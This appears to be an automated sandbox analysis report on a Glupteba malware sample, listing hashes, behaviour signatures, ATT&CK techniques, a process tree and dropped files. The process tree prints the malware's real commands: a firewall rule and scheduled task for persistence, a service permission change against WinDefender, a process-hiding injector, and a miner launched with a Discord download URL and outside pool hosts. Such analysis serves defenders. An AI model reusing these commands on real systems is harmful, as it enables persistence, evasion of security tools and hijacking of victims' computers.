Analysis
-
max time kernel
257s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
16/05/2024, 23:36
General
-
Target
86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe
-
Size
4.1MB
-
MD5
e0e1ee22a2a7e89d0e974ddcafec1ad8
-
SHA1
59984a24de697e697b2b62da9c50f53baef97613
-
SHA256
86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058
-
SHA512
66c8fa3ff59336c5ff79b22aa291b73c51a77865dd96eca428449904cd157be45bdadabd90d7c2860b4b7e5d35b6c566a83ae08e9beda6a1884453fe11c00df1
-
SSDEEP
98304:IjBgyvXIU5i0ZT37WYIgo6CvO2n1yECcNHBKQxGN:qB+ki0ZT37WYo6qf1ySNh3A
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 30 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 18 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Using powershell.exe command.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of WriteProcessMemory 39 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"C:\Users\Admin\AppData\Local\Temp\86c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
-
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
Filesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD58b211e5940ff4d1e86039fb3abae0763
SHA1c260ecfbb1fca55b675ce76246f775bf7fc717e2
SHA256d439fe629bbb4cb5b21e3b43dd36e32316899ff82e31986a8a71bf4c62d4c23c
SHA51243c410e243ac29a1c2fff0a417689e1c5ead1bbd8ab92db6c7b73980bc428d0836f4d3321abfd9b9282215efd3cdbe9557945d6bead425ffb59c3a8d112b2db3
-
Filesize
18KB
MD52c72522e5a35146d5111b1cd9b9ef740
SHA1f99b86cb4ee4dcfb7ba7c4b5925d3c8975d98f08
SHA2562326b40e99fd300f86d40f41f222d06d23cefc55994bcb9c3d579e0ce8842412
SHA512cb6c069c4e66131cea23a04ab24de1b1abd03fc4e9ca6052e6b3351fc26180a343e0dfb22c567a11141ec6c5fb092f58b1173f545220ab4b829b3eb365bd29b2
-
Filesize
18KB
MD52a60b7e53a3ddabfc6cf4d6a68c52714
SHA19fa4662f35d65310036ef2775eb698d85e3c1a3d
SHA25654395bb72dca43893695559afeca0e3416cb2e0dbce055390f952a59c0614ad3
SHA5125c0c57093b7464d63caa3cfd4c5527c52430b483e8179523e212213b5ed23c2d77f990be10d53224e7e582f9b98926c09f2ce55377a1c7fed009ea5e5cd124c1
-
Filesize
18KB
MD5826092d554d836cf46d626294d73e218
SHA18a85bc39dc505ad4742e9e3acf4f4c1c01512ec9
SHA256d24a87cfa379466a72e2abce3b27cdd93cdeacd288c18da66a2323b7014e33ac
SHA5129670f5ea9257244c93e9b41b4d962473394cf722a40d766bade8b41b05ff51ce075780c779b27c835360134e40ff4d1e6eb8d7f495a89b67cbca06cd9f47779c
-
Filesize
18KB
MD528d798da185bf344e1ade7ceaa9ae5de
SHA1f5588122f00d2c7e17e4d2e5b5c40df776a379e9
SHA25610c5b8f91556ed1c3bebac0b65ffb7ee16217a769318bdf2c7ad9a5e094a7fb5
SHA512a2c9f1536275c84fd2427969b7ab33f3bbcb81d5d33f3e2651bcaa8b44f24c1251607073b871df5b0c296a14b4831562d51848fb40ef75665c43d15157c511c3
-
Filesize
18KB
MD5f39dd0049a9bb23ee32fcaed65ab6684
SHA13a8fa2ea83e27723fa110634801574aa8124efdd
SHA2569fd60fb22eb4572764c86bc71997a08a717b16003e5a2c820a79de548f017822
SHA5123264ffdf018a914ea2a1d6b5804d7ef923ed407b2582e9c99fcd9090c9c7201d1ac791c54bbc77f104033ca24bf53ca8c366caab6c9ba7edd13a5663d679450c
-
Filesize
18KB
MD58ee649a834aad05619553abf844855af
SHA11af12fa5cfdeec5b804c4164f9212ce5cd6fc344
SHA256f43f5dbbd0f6ea43b15eea6b0b731bf192813a222f2023471f84cffb99457463
SHA512084fb3036fb58cb46046abc5999197762bdc02b5d548ab22cdacb9636df4bed6b04bf8f5186c78313f70f2583b72199b0b6bbf9d8700bffbcdf9936f58ca50ca
-
Filesize
18KB
MD563eabac68530be91dcaaccc2d5988951
SHA1f9008998b8579141865b13f8dc83535560f51c3c
SHA256f476fd9ef42d61dca1954e4a8fbe90b5556ddae9d62fe5df8ccf2a95a5698ac7
SHA512929fcead730e1bfac4764f797bac4805c7ec58c04c140dbe5896c97e0d7e936fdad5e7220f2b64bd17c17a46f1a49777c612408b727715d6f1a32d88bf6a4e8c
-
Filesize
4.1MB
MD5e0e1ee22a2a7e89d0e974ddcafec1ad8
SHA159984a24de697e697b2b62da9c50f53baef97613
SHA25686c53a93315eea8ac624e171c0b9d6755189864d85fa278ae5292c306f073058
SHA51266c8fa3ff59336c5ff79b22aa291b73c51a77865dd96eca428449904cd157be45bdadabd90d7c2860b4b7e5d35b6c566a83ae08e9beda6a1884453fe11c00df1
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
9.1MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
9.1MB
-
Filesize
4.0MB
-
Filesize
8.9MB
-
Filesize
9.1MB
-
Filesize
8.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
660KB
-
Filesize
204KB
-
Filesize
6.9MB
-
Filesize
300KB
-
Filesize
472KB
-
Filesize
240KB
-
Filesize
300KB
-
Filesize
112KB
-
Filesize
6.9MB
-
Filesize
32KB
-
Filesize
592KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB